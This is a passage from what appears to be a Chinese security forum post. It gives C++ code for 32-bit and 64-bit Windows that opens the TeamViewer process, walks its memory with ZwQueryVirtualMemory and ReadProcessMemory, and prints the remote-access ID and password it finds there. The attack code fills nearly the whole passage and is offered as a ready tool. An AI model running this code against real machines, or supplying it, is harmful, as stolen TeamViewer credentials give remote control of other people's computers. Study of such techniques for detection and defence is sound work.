<span class=hljs-keyword>char</span> id[<span class=hljs-number>0x17</span>]; <span class=hljs-comment>//存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00</span>
<span class=hljs-keyword>char</span> id_char[<span class=hljs-number>0xA</span>] = {<span class=hljs-number>0</span>}; <span class=hljs-comment>//unicode转换为ASCII存放的数组</span>
<span class=hljs-keyword>char</span> password[<span class=hljs-number>0x15</span>]; <span class=hljs-comment>//存放密码的unicode数组加上前面的0x88和后面的0x000x00</span>
<span class=hljs-keyword>char</span> password_char[<span class=hljs-number>0x9</span>] = {<span class=hljs-number>0</span>}; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((<span class=hljs-keyword>int</span>)mbi.BaseAddress + i), password, <span class=hljs-number>0x15</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((<span class=hljs-keyword>int</span>)mbi.BaseAddress + i), id, <span class=hljs-number>0x17</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-comment>//内存中读出数据</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x8</span>; x++) {
password_char[x] = password[ x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span> ];
}
<span class=hljs-comment>//将0x00去除写入password_char数组</span>
password_char[<span class=hljs-number>8</span>] = <span class=hljs-string>'\x00'</span>; <span class=hljs-comment>//最后加上\x00结尾</span>
<span class=hljs-keyword>if</span> (password[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff88</span> &amp;&amp; password[<span class=hljs-number>17</span>] == <span class=hljs-number>0</span> &amp;&amp; password[<span class=hljs-number>18</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(password_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9a-z]{8}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]password: %s\n"</span>, password_char);
password_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x9</span>; x++) {
id_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//同上</span>
id_char[<span class=hljs-number>9</span>] = <span class=hljs-string>'\x00'</span>;
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff80</span> &amp;&amp; id[<span class=hljs-number>19</span>] == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>20</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(id_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9]{9}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]id: %s\n"</span>, id_char);
id_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了</span>
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>1</span> &amp;&amp; password_temp == <span class=hljs-number>1</span>) {
<span class=hljs-keyword>break</span>;
}
<span class=hljs-comment>//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了</span>
}
<span class=hljs-keyword>break</span>;
}
StartAddress += mbi.RegionSize; <span class=hljs-comment>//不是就加上当前内存块大小继续遍历</span>
} <span class=hljs-keyword>while</span> (StartAddress &lt;= EndAddress);
}
</code></pre>
<p blockindex=41><img src="
<h2 blockindex=42>0x05 代码实现 x64</h2>
<p blockindex=43>64位中线程的内存地址都比进程基址小了就是存有ID密码的内存都到进程上面了</p>
<p blockindex=44><img src="
<p blockindex=45>都是7FFE0000开始这样就不用先得到进程基址可以直接遍历</p>
<p blockindex=46>还有在64位中密码开头的数字变成了0x90这也是需要改下的别的基本都是相同的</p>
<p blockindex=47><img src="
贴一下修改后的代码</p>
<pre blockindex=48><code class="hljs language-c++"><span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;stdio.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;Windows.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;dbghelp.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>pragma</span> comment(lib,<span class=hljs-meta-string>"dbghelp.lib"</span>)</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;shlwapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>"tlhelp32.h"</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;psapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;regex&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> _WIN64</span>
_int64 EndAddress = <span class=hljs-number>0x0007FFFFFFFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>else</span></span>
<span class=hljs-keyword>int</span> EndAddress = <span class=hljs-number>0X7FFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span> <span class=hljs-comment>//根据位数不同遍历的地址大小不同</span></span>
<span class=hljs-keyword>using</span> <span class=hljs-keyword>namespace</span> std;
<span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
<span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
)</span></span>;
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>GetPidByName</span><span class=hljs-params>(PCWCHAR procName)</span> </span>{
HANDLE ProcessId = <span class=hljs-built_in>CreateToolhelp32Snapshot</span>(TH32CS_SNAPPROCESS, <span class=hljs-literal>NULL</span>);
<span class=hljs-keyword>if</span> (ProcessId == <span class=hljs-literal>NULL</span>) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"Fail"</span>);
}
PROCESSENTRY32 te32 = { <span class=hljs-number>0</span> };
te32.dwSize = <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(te32);
<span class=hljs-keyword>int</span> number = <span class=hljs-number>0</span>;
<span class=hljs-keyword>if</span> (<span class=hljs-built_in>Process32First</span>(ProcessId, &amp;te32)) {
<span class=hljs-keyword>do</span> {
<span class=hljs-keyword>if</span> (!<span class=hljs-built_in>lstrcmp</span>(te32.szExeFile, procName)) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]TeamViewer PID: %d\n"</span>, te32.th32ProcessID);
<span class=hljs-keyword>return</span> te32.th32ProcessID;
}
} <span class=hljs-keyword>while</span> (<span class=hljs-built_in>Process32Next</span>(ProcessId, &amp;te32));
}
} <span class=hljs-comment>//用进程名得到PID</span>
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>main</span><span class=hljs-params>()</span> </span>{
MEMORY_BASIC_INFORMATION mbi = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//初始化MEMORY_BASIC_INFORMATION结构</span>
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)<span class=hljs-built_in>GetProcAddress</span>(<span class=hljs-built_in>GetModuleHandleA</span>(<span class=hljs-string>"ntdll.dll"</span>), <span class=hljs-string>"ZwQueryVirtualMemory"</span>);
<span class=hljs-comment>//ndtll.dll得到ZwQueryVirtualMemory</span>
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>) {
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>)
{
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"没有找到ZwQueryVirtualMemory函数"</span>);
<span class=hljs-built_in>system</span>(<span class=hljs-string>"pause"</span>);
<span class=hljs-keyword>return</span> <span class=hljs-number>0</span>;
}
}
<span class=hljs-comment>//如果为NULL就是没找到</span>
HANDLE hProcess = <span class=hljs-built_in>OpenProcess</span>(PROCESS_ALL_ACCESS, <span class=hljs-number>0</span>, <span class=hljs-built_in>GetPidByName</span>(<span class=hljs-string>L"TeamViewer.exe"</span>));
_int64 StartAddress = <span class=hljs-number>0x000000007FFE0000</span>;
<span class=hljs-keyword>do</span> {
<span class=hljs-built_in>ZwQueryVirtualMemory</span>(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(mbi), <span class=hljs-literal>NULL</span>); <span class=hljs-comment>//从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构</span>
<span class=hljs-keyword>if</span> (mbi.RegionSize == <span class=hljs-number>0x1FF000</span>) { <span class=hljs-comment>//查看内存大小是否为1FF000</span>
<span class=hljs-keyword>int</span> id_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//临时变量找到了就改为1避免重复读取</span>
<span class=hljs-keyword>char</span> password_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//同上</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> i = <span class=hljs-number>0</span>; i &lt; <span class=hljs-number>0x1FF000</span>; i++) {
<span class=hljs-keyword>char</span> id[<span class=hljs-number>0x17</span>]; <span class=hljs-comment>//存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00</span>
<span class=hljs-keyword>char</span> id_char[<span class=hljs-number>0xA</span>] = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//unicode转换为ASCII存放的数组</span>
<span class=hljs-keyword>char</span> password[<span class=hljs-number>0x15</span>]; <span class=hljs-comment>//存放密码的unicode数组加上前面的0x88和后面的0x000x00</span>
<span class=hljs-keyword>char</span> password_char[<span class=hljs-number>0x9</span>] = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), password, <span class=hljs-number>0x15</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), id, <span class=hljs-number>0x17</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-comment>//内存中读出数据</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x8</span>; x++) {
password_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//将0x00去除写入password_char数组</span>
password_char[<span class=hljs-number>8</span>] = <span class=hljs-string>'\x00'</span>; <span class=hljs-comment>//最后加上\x00结尾</span>
<span class=hljs-keyword>if</span> (password[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff90</span> &amp;&amp; password[<span class=hljs-number>17</span>] == <span class=hljs-number>0</span> &amp;&amp; password[<span class=hljs-number>18</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(password_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9a-z]{8}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]password: %s\n"</span>, password_char);
password_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x9</span>; x++) {
id_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//同上</span>
id_char[<span class=hljs-number>9</span>] = <span class=hljs-string>'\x00'</span>;
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>0</span>] == <span class=hljs-number>0x20</span> &amp;&amp; id[<span class=hljs-number>19</span>] == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>20</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(id_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9]{9}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]id: %s\n"</span>, id_char);
id_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了</span>
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>1</span> &amp;&amp; password_temp == <span class=hljs-number>1</span>) {
<span class=hljs-keyword>break</span>;
}
<span class=hljs-comment>//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了</span>
}
<span class=hljs-keyword>break</span>;
}
StartAddress += mbi.RegionSize; <span class=hljs-comment>//不是就加上当前内存块大小继续遍历</span>
} <span class=hljs-keyword>while</span> (<span class=hljs-number>0</span> &lt;= StartAddress);
}
</code></pre>
<p blockindex=49><img src="
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2021-12-27 14:56:30
</li>
<li>阅读 ( 6524 )</li>
<li>分类:<a href=https://forum.butian.net/community/develop target=_blank rel="noopenner noreferrer">安全开发</a>
</li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=1029 data-support_num=5> 5 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=1029> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">0 条评论</h2>
<div class=comment>
</div>
<div class="widget-comment-form row mt-20 mb-20">
<div class=col-md-12>
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-1029 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div>